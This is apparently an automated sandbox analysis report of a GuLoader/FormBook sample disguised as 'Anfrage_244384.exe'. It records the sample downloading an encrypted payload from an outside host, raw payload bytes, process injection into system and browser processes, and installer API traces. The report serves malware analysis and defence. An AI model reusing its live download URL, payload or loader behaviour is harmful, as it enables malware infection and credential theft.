0	192.168.2.6	49927	188.40.95.144	443	5608	C:\Users\user\Desktop\Anfrage_244384.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-06 15:11:29 UTC	179	OUT	GET /LxuQG254.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: familytherapycenter.rs Cache-Control: no-cache
2024-11-06 15:11:29 UTC	320	IN	HTTP/1.1 200 OK Date: Wed, 06 Nov 2024 15:11:29 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Wed, 06 Nov 2024 12:59:16 GMT Accept-Ranges: bytes Content-Length: 287296 Cache-Control: max-age=172800 Expires: Fri, 08 Nov 2024 15:11:29 GMT Content-Type: application/octet-stream
2024-11-06 15:11:29 UTC	7872	IN	Data Raw: c0 b9 3e 28 30 da 83 9a 5c ed 72 ef 7f 0f 8d 33 3e c7 04 23 96 31 bc 25 ad e5 43 f8 24 a5 16 89 26 43 4e 31 c7 bf 6f 29 35 dc b7 c3 b3 2d 13 86 80 e0 62 7f 60 b5 09 59 58 ff 5b 35 c9 eb 2a 5f ed 0d 1d 90 95 18 50 b9 be b0 fe 42 cb 14 a5 11 41 0f 5d 6d e1 33 b9 61 15 f1 b7 57 ab fa 18 78 a5 38 7a 10 1f 8f 54 44 33 a1 b3 98 8d fd 6b 7b 8f 0e 63 ea 35 ee 5a 74 d1 f3 27 e3 4a 72 16 b2 ba 9e c3 a3 a8 20 0c 5d a5 b0 e7 36 77 cb 78 3d af ae e6 5a 07 a7 12 a5 56 53 4c 64 89 9f 0e 80 ff c3 e5 20 5e 28 0d 49 ee 4f 4a 41 91 5d 79 38 b9 df 7e 36 e4 55 31 f4 80 e1 19 55 21 cd bd 89 52 b8 b7 25 34 52 be e4 5b fb e1 66 e7 2f 13 e9 c6 c3 9e 11 d0 7f e1 ab 6c 77 20 f3 71 ec 37 f2 02 13 ce 13 41 45 23 1f c9 38 c4 7c 6d 2b b2 46 ef 41 d0 a2 17 42 e5 a8 18 73 ee 3f cf 3a ef Data Ascii: >(0\r3>#1%C$&CN1o)5-b`YX[5*_PBA]m3aWx8zTD3k{c5Zt'Jr ]6wx=ZVSLd ^(IOJA]y8~6U1U!R%4R[f/lw q7AE#8\|m+FABs?:
2024-11-06 15:11:30 UTC	8000	IN	Data Raw: 37 78 b6 2d 64 dc cc bd 71 a2 a3 f5 7a c9 60 8f fa 0e 2c 56 ec 90 7d 40 7c e0 de 01 b8 f1 ae b8 48 8e 6c e8 c6 96 22 42 dd 40 95 8a 97 dd 4f fe ba e9 8b d3 54 56 96 6f 07 21 f1 fe 6d f5 da 13 a0 0b 9e 10 72 1e cc 96 b9 bc 4c 3e e3 6f 9b 7f 30 98 de 96 ed 14 ae cb 4b fd 75 49 02 9c a2 cf 4c da 99 2d aa a9 b0 cc ff 65 32 21 9b cb 2d 20 49 b3 a2 e5 12 91 df c2 ac 46 9e 17 a1 64 df 15 b8 6e b9 86 f1 ab 67 8f d0 16 08 4d 0e 53 d2 cd e4 b5 af 07 e2 e7 34 57 bd d0 b4 72 e8 9f 55 86 68 90 63 10 d3 1a 3b 46 81 31 f6 36 26 8b aa 86 81 f1 33 23 c3 05 ab 6b 9f 6b 1f 0c c5 da b8 51 bc 18 8f 50 1c 26 76 76 e9 c7 71 c5 1c 61 b7 66 5d 86 e3 c4 94 20 ff b0 2e 3c fa e2 0b 75 b1 eb 62 df 8d 5a 86 88 4a 01 aa 7c d4 8b 3f e0 b7 35 f4 bf d1 f7 ca 6d 13 f2 05 9d ab 48 37 3f 0e Data Ascii: 7x-dqz`,V}@\|Hl"B@OTVo!mrL>o0KuIL-e2!- IFdngMS4WrUhc;F16&3#kkQP&vvqaf] .<ubZJ\|?5mH7?
2024-11-06 15:11:30 UTC	8000	IN	Data Raw: 8c 4b 9e 21 ec b5 43 2f e4 32 b2 06 03 88 73 63 ea dc 05 b2 bb c4 a4 18 46 67 13 43 5d 46 42 11 c0 a6 53 d2 80 fc 44 47 29 34 88 65 fb 18 ad 8e 1e 1c 44 c0 c1 5d 7f 9c a2 d2 e6 d8 89 5f 5a 9f 9a 86 a8 af d9 fc 13 3b 71 38 4b 8b f5 ff 30 1d 73 dd 7a 05 bc 00 84 12 43 18 a6 13 1d 89 61 95 8b 47 42 8c 69 5f 49 64 85 d9 0f 40 f4 e5 59 b0 7f 0b d0 50 49 0b 8f 3d 37 bd 35 ea 47 07 83 ad 51 97 d6 6f 85 d0 ba 63 4d 5b 75 d2 ce 6e a6 66 88 f9 1e 04 6b 6c 63 e4 24 fb fb a9 1a 91 1c 84 e0 de bd d0 28 ed 63 7c 2c 16 5a e4 1f e5 b0 4f a9 05 6b 01 d4 07 21 5f 98 96 f6 c4 f5 d4 53 28 cd 6e c0 a8 61 69 39 f4 67 61 4d 36 c6 9e b7 bc 9c 5b c1 99 6b 01 60 68 56 21 9e 4e 8c dc 81 f4 09 32 77 00 0c 7e dd de 7a d6 9c 86 4f e7 cb d6 0b 9f 4a b0 a5 ca 88 bf 94 e4 d3 40 1a b2 40 Data Ascii: K!C/2scFgC]FBSDG)4eD]_Z;q8K0szCaGBi_Id@YPI=75GQocM[unfklc$(c\|,ZOk!_S(nai9gaM6[k`hV!N2w~zOJ@@
2024-11-06 15:11:30 UTC	8000	IN	Data Raw: 0e 7c 72 21 38 05 ca f2 1f 3a bd 3d ce 1a 5d 37 07 86 a1 67 81 ce 06 52 1a a8 8a fd a6 37 61 44 46 e7 af 09 2b 2b b3 f5 cb eb c1 6c 4b ea d5 13 60 9b 4a 16 51 ec 21 64 c9 98 00 d1 8f 64 2c 77 78 97 e3 44 fd a9 eb 5b 8b 7a 40 81 74 06 e3 c2 81 bf d1 bb 9c 34 f7 fc ea 21 d7 bc 8e 4b 7e c7 8a 35 f1 99 4d 22 69 41 d7 2f b0 ce db f3 f6 d2 17 91 a7 0c 0e 3c 99 15 e6 8b 58 a1 83 c0 16 a1 e1 5e f1 15 37 e0 57 98 1d 23 79 2a f7 ce 25 a3 19 f2 ba d6 22 5e 6f 04 8d 90 e8 c8 88 ee a6 fc 84 c8 6f b1 37 f8 7f 8d 0d 9e 5c 39 c7 7d 2d dd 4e d5 43 a3 39 f1 17 62 ba 5a 55 8a 3e a4 24 a2 3b 22 a3 e0 c3 9b ef 7e 1c 47 55 2e 1f ba d0 54 b7 0f 16 bb 5e dd 27 34 ac 93 71 a2 4d a1 03 48 13 35 af ab 37 32 58 3d 21 f3 92 44 47 f3 a7 92 b1 ff 62 7a e3 55 e9 9a 3a 3e 1e 0f eb 60 a5 Data Ascii: \|r!8:=]7gR7aDF++lK`JQ!dd,wxD[z@t4!K~5M"iA/<X^7W#y*%"^oo7\9}-NC9bZU>$;"~GU.T^'4qMH572X=!DGbzU:>`
2024-11-06 15:11:30 UTC	8000	IN	Data Raw: fb 4c b2 a6 fc 08 13 7e d3 3a 5a 4e 78 47 0b c1 d2 de 37 be 8f 87 03 17 53 01 dd f3 64 8a e7 2f 85 9a f0 bd 3c 59 85 20 a3 9c 4b ec 7b 77 8e 54 8a 87 02 3e 69 05 2e 67 22 f9 89 81 4e 02 ec 65 fe 84 75 92 7b 5a 66 83 d8 57 da 5b ca a0 a8 f1 75 d9 2a d0 a2 a9 0f dc 31 12 5d d2 2f 82 50 e0 7d 59 e7 a1 cd b4 2b 34 4a 86 4f 81 fb 1d c2 c7 52 95 98 d1 f5 1d c2 d2 6f 3f 81 69 aa 89 9d 1f 49 de 32 ff c5 8c f2 87 f7 98 16 da f4 23 03 93 0f 35 ac f0 5b f1 63 a4 b3 02 22 2a f9 2a e0 7c ee f8 fd a7 bf cb 9b 98 66 28 62 31 1f 01 2e de d8 4b 64 79 30 d0 03 7b ef 4a ad 15 d2 02 b6 ed 72 bf dd b7 3f 9b d6 fb c0 e2 f1 87 8a 80 b3 36 38 38 02 b2 20 4a 53 3a f5 0a ab eb 79 f4 ca 7e d6 28 c8 66 82 74 54 b0 db d1 b0 3c f7 5a 0a f4 f5 90 67 f0 87 8a 78 ad a6 bf 6c 70 d8 cf 46 Data Ascii: L~:ZNxG7Sd/<Y K{wT>i.g"Neu{ZfW[u1]/P}Y+4JORo?iI2#5[c"*\|f(b1.Kdy0{Jr?688 JS:y~(ftT<ZgxlpF
2024-11-06 15:11:30 UTC	8000	IN	Data Raw: 4b 9f 91 bf dc 4b 44 c4 e8 12 cf f2 ce 46 5d bc 9f 8b ae 7d 5d 91 10 1a 4f 11 11 06 6b c3 a4 48 29 ce 69 da 2c c7 0d d0 88 df bb 6b 66 1e 9e 06 43 90 25 c1 79 e3 91 4c e9 8e 6e 79 43 a2 b2 aa f9 90 03 bc 34 57 54 c3 44 39 de 7c 88 c5 06 26 aa d8 68 69 e9 82 8a af 5b e3 23 cf 41 84 76 1e 27 37 12 94 03 3a 55 ad 99 39 08 c3 28 b9 43 70 ca d2 67 bb a2 13 78 c8 44 00 b0 9c 50 db 39 a3 60 5c f1 4d 6f 22 12 19 78 78 ce c3 f2 9a 3f ce 15 4d 11 46 da 50 32 df e5 cf f3 8c f7 36 44 62 35 73 cc 3e dd 79 ec c8 26 d3 bf 2d 1f e5 de 10 94 5a 85 5b 9a b7 d2 c0 09 3a 3d d8 b6 bb 20 3f 3d 8d f2 18 af 7a cf 0b 07 4b 2e a8 c1 26 f9 a1 50 94 f8 a1 12 1b be 2c 89 cb 39 1c 02 55 27 ef 49 6c 57 d6 34 9b 49 96 7a 1f 9b 6a ff 29 53 21 54 4b a5 e5 3d 90 61 de ea 46 29 1b 77 d5 29 Data Ascii: KKDF]}]OkH)i,kfC%yLnyC4WTD9\|&hi[#Av'7:U9(CpgxDP9`\Mo"xx?MFP26Db5s>y&-Z[:= ?=zK.&P,9U'IlW4Izj)S!TK=aF)w)
2024-11-06 15:11:30 UTC	8000	IN	Data Raw: 80 3e 02 6f 84 0d a2 1f 73 d5 14 38 01 2f cb 41 85 a6 09 43 4b 12 19 03 01 37 de b1 6a e9 06 de 34 3e 95 0e 5e c8 7a 80 e6 e8 92 0a f4 0d f5 b0 9e e9 e5 d8 61 d4 91 22 dd ff e1 e8 1b 1a 78 49 3c 5b 99 18 b7 d2 a9 6e ff d4 92 da b9 87 ee 68 64 ca 40 12 83 63 7f a5 ee 3a 08 39 7c 71 66 3c 60 fb 05 36 01 c1 96 3d 2a 81 9b 80 ae 6c e8 f1 b0 34 d7 8e f8 83 f5 f0 5d 9f 24 43 31 a9 d5 38 90 af a6 f7 87 78 df 83 ab c3 99 82 16 ec 1f f2 72 47 2b a2 4d 61 e6 ce 0e 7e 05 2a 88 51 01 bf 71 dd e3 06 c5 76 02 35 73 33 b7 73 06 d0 ce 5d 4c 8c b6 24 68 dd d6 7c c3 6c 0d 4f 7f f9 43 98 0a 32 1d 1c 1e e3 f3 9b d6 b8 a9 e8 8a d1 6c ef fb e1 50 ff a9 48 77 a5 57 81 e2 19 97 f2 be b9 65 16 07 06 1e d2 6e e8 78 fa 98 89 b6 e1 ee cb cb 9f 42 95 35 df b6 77 99 27 0b f8 03 65 3f Data Ascii: >os8/ACK7j4>^za"xI<[nhd@c:9\|qf<`6=l4]$C18xrG+Ma~Qqv5s3s]L$h\|lOC2lPHwWenxB5w'e?
2024-11-06 15:11:30 UTC	8000	IN	Data Raw: 44 2a de 77 5a fe c1 7c 43 23 66 89 c1 cd 5f c2 a0 f6 3f 97 8c db 3b a9 85 7c 5c 89 bc 08 6e 68 98 e4 46 38 ea 9e e8 a2 e2 77 31 3f bd 80 ee 7b 09 4c 1c 78 d7 44 af bf 2d 7d dd b3 f5 89 ba ef 46 d5 8a 1b 02 03 6f 7c 18 53 a2 a2 21 2a 9a 6e c8 d7 80 2d 06 4c 00 4c 75 a3 8b d1 9f b2 80 61 91 f4 a0 49 9b 46 2f eb cd 6b c6 91 70 fe 3f da 2c fb 9e 15 1f e4 3d b9 03 26 48 1d ad fc d1 a7 f6 2c 0f 79 54 9e c5 31 19 16 41 27 60 46 63 90 9a 63 d4 8e 7d 2d 16 a4 60 87 f3 f3 8f 93 50 ed 87 6a 4d f7 04 24 03 ce 4c f4 23 18 ed 7a 51 ff 9e dd 3b a7 3e e3 4e f8 2c 6a 3a d2 3c f3 81 e7 f2 c9 01 6d b3 ee 33 67 80 3f 3e d3 38 b0 38 bf 21 03 11 53 38 82 30 8c fc 42 5b ab 59 17 93 dd af fc fb 7b 43 bf b4 fc 80 2b 2e 84 59 4c c6 e3 53 a5 53 88 0a bb 98 64 94 d8 02 06 99 4f 98 Data Ascii: DwZ\|C#f_?;\|\nhF8w1?{LxD-}Fo\|S!n-LLuaIF/kp?,=&H,yT1A'`Fcc}-`PjM$L#zQ;>N,j:<m3g?>88!S80B[Y{C+.YLSSdO
2024-11-06 15:11:30 UTC	8000	IN	Data Raw: 52 83 cc 74 9a 65 b2 4d b1 a9 ce bd f4 b9 0a 0f 8f 6a bd d1 83 8f 27 59 c6 83 e3 d5 4b 69 6c 08 30 6c d6 38 99 9b 12 e8 0a 41 23 d8 36 e1 25 74 e9 c1 22 05 42 31 4d a3 21 aa 06 13 75 55 87 ec e7 74 1a 65 d2 5c d4 3a 93 b2 b5 03 b5 45 79 bb c9 fa 60 23 5c 61 ef 91 9b 4b 65 6d fe d8 5e 98 3b 32 2c 4c 25 80 7b 32 f4 88 2a 57 b0 ae 8a 4d fa 43 c0 f2 9d 1b 3b ff e4 6d 04 4e dc bb ed e5 8c 97 45 5c bd 55 a5 86 73 0f 71 15 36 8e dc 88 2d 06 a8 a0 54 f8 28 3e e2 27 e0 1f 1d 8f 33 e4 3a c9 c8 b5 01 3b 8d 18 56 77 4b cc b9 b2 8b 18 77 55 af 7a a4 c2 6d 0e c7 89 31 d4 eb c8 27 7f e2 92 14 24 9e 06 24 3d 3d 6c 88 ad 87 fb 05 01 61 e9 30 ed 30 d4 5b ae 17 2a f0 1c 80 70 87 ed 07 f5 4a 63 2b a1 52 3b 4f 24 45 7c a7 6b 65 10 c6 d0 46 7a 2f 75 27 ec e5 0f 02 03 e6 db ca Data Ascii: RteMj'YKil0l8A#6%t"B1M!uUte\:Ey`#\aKem^;2,L%{2WMC;mNE\Usq6-T(>'3:;VwKwUzm1'$$==la00[pJc+R;O$E\|keFz/u'
2024-11-06 15:11:30 UTC	8000	IN	Data Raw: cb af f0 25 7f 9c 76 14 0e c5 87 47 b1 f7 1d c1 25 40 ed 8a c2 58 98 c9 db b4 ee 1b 40 f1 99 40 6d 0e b7 2d 44 ab c0 70 7d 88 f3 7b 06 e6 2d 46 34 aa 53 0c b4 40 db 53 0b e3 d9 51 12 3d 6f 28 20 c3 ef f8 52 f0 a5 c6 03 f4 49 63 53 ff 5b e5 21 4f 4b dd 1c bd 1f 7f 1a 9f 18 f5 9a 4e 24 2f 9b 3a 45 69 62 aa 4c 74 38 19 ec 6d f4 c3 5b fd da 6b 6d 25 dc d6 3f e7 c0 22 8e 60 b7 7c df dc fa 21 0a 2d f8 29 2d a1 b8 8a 08 2e bb f2 cf 6c 98 b5 f2 1a 76 70 2c db 98 f6 6f 79 64 47 73 a9 d5 31 38 db 8b a6 bd 8e dd d8 ca 32 dd 57 3f 09 65 7e b5 d6 73 7b 7c 97 8e 21 a5 3b 95 af 5b f2 65 b9 cb 09 74 d4 76 8f 58 e9 5b 6b 40 8a 5e ef 4d 6d cd a8 29 c3 70 61 6d 63 77 02 a7 0b b8 93 3c 4e e8 d0 e9 f2 40 38 48 80 9b 4e e8 55 fc a3 d0 32 23 e3 a3 48 17 8c 8c 56 6f 91 a0 81 40 Data Ascii: %vG%@X@@m-Dp}{-F4S@SQ=o( RIcS[!OKN$/:EibLt8m[km%?"`\|!-)-.lvp,oydGs182W?e~s{\|!;[etvX[k@^Mm)pamcw<N@8HNU2#HVo@

Target ID:	0
Start time:	10:10:32
Start date:	06/11/2024
Path:	C:\Users\user\Desktop\Anfrage_244384.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Anfrage_244384.exe"
Imagebase:	0x400000
File size:	1'240'824 bytes
MD5 hash:	B03F23199AE987A7BCE0FF1A0D742E3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2597198603.0000000004A03000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	10:11:21
Start date:	06/11/2024
Path:	C:\Users\user\Desktop\Anfrage_244384.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Anfrage_244384.exe"
Imagebase:	0x400000
File size:	1'240'824 bytes
MD5 hash:	B03F23199AE987A7BCE0FF1A0D742E3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3122242151.0000000034330000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3123079037.0000000035D90000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	10:12:03
Start date:	06/11/2024
Path:	C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe"
Imagebase:	0x9c0000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3362392086.0000000004560000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	10:12:04
Start date:	06/11/2024
Path:	C:\Windows\SysWOW64\verclsid.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\verclsid.exe"
Imagebase:	0xbe0000
File size:	11'776 bytes
MD5 hash:	190A347DF06F8486F193ADA0E90B49C5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3362363415.0000000000960000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3361086022.00000000003B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3362535904.00000000009B0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	10:12:19
Start date:	06/11/2024
Path:	C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe"
Imagebase:	0x9c0000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3361838593.00000000007B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	10
Start time:	10:12:31
Start date:	06/11/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x7ff728280000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	22.8%
Dynamic/Decrypted Code Coverage:	14.3%
Signature Coverage:	21.5%
Total number of Nodes:	1472
Total number of Limit Nodes:	46

Executed Functions

Function 004031A3 Relevance: 93.1, APIs: 33, Strings: 20, Instructions: 357
stringcomfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE ref: 004031C8
GetVersion.KERNEL32 ref: 004031CE
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004031F7
#17.COMCTL32(00000007,00000009), ref: 00403219
OleInitialize.OLE32(00000000), ref: 00403220
SHGetFileInfoA.SHELL32(00429828,00000000,?,00000160,00000000), ref: 0040323C
GetCommandLineA.KERNEL32(Debutromaners241 Setup,NSIS Error), ref: 00403251
GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\Anfrage_244384.exe",00000000), ref: 00403264
CharNextA.USER32(00000000,"C:\Users\user\Desktop\Anfrage_244384.exe",00000020), ref: 0040328F
GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 0040338C
GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040339D
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004033A9
GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004033BD
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004033C5
SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 004033D6
SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 004033DE
DeleteFileA.KERNELBASE(1033), ref: 004033F2

Part of subcall function 0040615C: GetModuleHandleA.KERNEL32(?,?,?,0040320D,00000009), ref: 0040616E
Part of subcall function 0040615C: GetProcAddress.KERNEL32(00000000,?), ref: 00406189

OleUninitialize.OLE32(?), ref: 004034A0
ExitProcess.KERNEL32 ref: 004034C1
GetCurrentProcess.KERNEL32(00000028,?), ref: 004035DE
OpenProcessToken.ADVAPI32(00000000), ref: 004035E5
LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004035FD
AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 0040361C
ExitWindowsEx.USER32(00000002,80040002), ref: 00403640
ExitProcess.KERNEL32 ref: 00403663

Part of subcall function 004055B9: MessageBoxIndirectA.USER32(0040A218), ref: 00405614

Strings

C:\Users\user\Desktop\Anfrage_244384.exe, xrefs: 0040357E
C:\Users\user\AppData\Roaming\secretaryships\Angoragedernes, xrefs: 0040347D
SeShutdownPrivilege, xrefs: 004035F7
C:\Users\user\AppData\Local\Temp\, xrefs: 00403381, 00403386, 0040339C, 004033A8, 004033B7, 004033C4, 004033D0, 004033D8, 004034D1, 004034E2, 004034ED, 004034F9, 00403506, 00403515, 004035C4
TEMP, xrefs: 004033D1
", xrefs: 004032B4
1033, xrefs: 004033ED
Low, xrefs: 004033BF
Debutromaners241 Setup, xrefs: 00403247
NSIS Error, xrefs: 00403242
C:\Users\user\Desktop, xrefs: 004034F3, 004034F8, 00403524
C:\Users\user\AppData\Roaming\secretaryships, xrefs: 00403371, 00403472, 0040351C, 00403525
UXTHEME, xrefs: 004031EB, 004031F0, 004031F6
Error launching installer, xrefs: 00403458
TMP, xrefs: 004033D9
"C:\Users\user\Desktop\Anfrage_244384.exe", xrefs: 00403257, 0040325D, 00403416
.tmp, xrefs: 004034E8
~nsu, xrefs: 004034CC
`K$v, xrefs: 004033CA
\Temp, xrefs: 004033A3

Memory Dump Source

Source File: 00000000.00000002.2596449027.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2596432455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596476754.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596600398.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Anfrage_244384.jbxd

Similarity

API ID: Process$Exit$EnvironmentFileHandleModulePathTempTokenVariableWindowslstrcat$AddressAdjustCharCommandCurrentDeleteDirectoryErrorIndirectInfoInitializeLineLookupMessageModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrlen
String ID: "$"C:\Users\user\Desktop\Anfrage_244384.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\secretaryships$C:\Users\user\AppData\Roaming\secretaryships\Angoragedernes$C:\Users\user\Desktop$C:\Users\user\Desktop\Anfrage_244384.exe$Debutromaners241 Setup$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$`K$v$~nsu
API String ID: 3329125770-2578287415
Opcode ID: c1f9194aaabd033ec7754895e46d654ced239fcc03380315cc0212c25b4d743a
Instruction ID: 865bae31cffe44a71533f85cac42dc3cbe617e6c2420eff4fa764eab91bf8bd9
Opcode Fuzzy Hash: c1f9194aaabd033ec7754895e46d654ced239fcc03380315cc0212c25b4d743a
Instruction Fuzzy Hash: 78C10530104741AAD721BF759D59A2F3EA9EF4530AF44443FF581B61E2CB7C8A058B6E

Function 00404959 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481
windowmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404971
GetDlgItem.USER32(?,00000408), ref: 0040497C
GlobalAlloc.KERNEL32(00000040,?), ref: 004049C6
LoadBitmapA.USER32(0000006E), ref: 004049D9
SetWindowLongA.USER32(?,000000FC,00404F50), ref: 004049F2
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A06
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404A18
SendMessageA.USER32(?,00001109,00000002), ref: 00404A2E
SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404A3A
SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404A4C
DeleteObject.GDI32(00000000), ref: 00404A4F
SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404A7A
SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404A86
SendMessageA.USER32(?,00001100,00000000,?), ref: 00404B1B
SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404B46
SendMessageA.USER32(?,00001100,00000000,?), ref: 00404B5A
GetWindowLongA.USER32(?,000000F0), ref: 00404B89
SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404B97
ShowWindow.USER32(?,00000005), ref: 00404BA8
SendMessageA.USER32(?,00000419,00000000,?), ref: 00404CA5
SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404D0A
SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404D1F
SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404D43
SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404D63
ImageList_Destroy.COMCTL32(?), ref: 00404D78
GlobalFree.KERNEL32(?), ref: 00404D88
SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404E01
SendMessageA.USER32(?,00001102,?,?), ref: 00404EAA
SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404EB9
InvalidateRect.USER32(?,00000000,00000001), ref: 00404ED9
ShowWindow.USER32(?,00000000), ref: 00404F27
GetDlgItem.USER32(?,000003FE), ref: 00404F32
ShowWindow.USER32(00000000), ref: 00404F39

Strings

N, xrefs: 00404BE3
, xrefs: 00404F11
M, xrefs: 00404B02

Memory Dump Source

Source File: 00000000.00000002.2596449027.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2596432455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596476754.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596600398.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Anfrage_244384.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
